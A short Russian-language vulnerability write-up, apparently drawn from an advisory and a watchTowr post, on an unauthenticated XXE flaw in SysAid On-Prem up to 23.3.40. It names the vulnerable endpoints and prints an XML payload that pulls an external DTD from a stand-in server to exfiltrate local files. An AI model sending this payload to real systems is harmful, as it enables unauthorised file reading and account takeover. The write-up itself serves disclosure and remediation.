Версии SysAid On-Prem <= 23.3.40 уязвимы к атаке XXE (XML External Entity) без аутентификации в функциональности Checkin, что позволяет захватить административный аккаунт и получить примитивы чтения файлов [1].

Уязвимость возникает из-за отсутствия надлежащей проверки и санитаризации пользовательского ввода в методе doPost класса GetMdmMessage. Атакующий может отправить специально сформированный XML-документ, содержащий внешнюю сущность, что приводит к XXE-атаке. Это позволяет злоумышленнику извлекать содержимое локальных файлов или взаимодействовать со службами внутренней сети. В частности, были обнаружены три вектора XXE-атаки: через endpoints /mdm/checkin, /mdm/serverurl и /lshw [2].

Для эксплуатации уязвимости атакующий может отправить POST-запрос на уязвимый endpoint с вредоносным XML-содержимым. Например, запрос к /mdm/checkin с заголовком Content-Type: application/xml и телом:

<?xml version="1.0" ?>
<!DOCTYPE foo [
  <!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
  %foo;
]>

Это приводит к тому, что сервер выполняет запрос к внешней DTD, что подтверждает наличие уязвимости. Используя эту уязвимость, атакующий может извлекать содержимое локальных файлов, таких как C:\windows\win.ini, путем использования внешней DTD для exfiltrации данных [1].

Однако было замечено, что полная exfiltrация содержимого файла возможна только для однострочных файлов из-за ограничений в обработке XML-сущностей в Java. Для обхода этого ограничения может быть использован метод error-based XXE, но в данном случае XXE является полностью слепой [2].

Кроме того, злоумышленник может попытаться использовать XXE для взаимодействия со внутренними службами, хотя в данном случае это не привело к повышению привилегий или выполнению команд [1].

Исправление уязвимости требует обновления до исправленной версии SysAid.

Источники:
- [1] https://documentation.sysaid.com/docs/24-40-60
- [2] https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/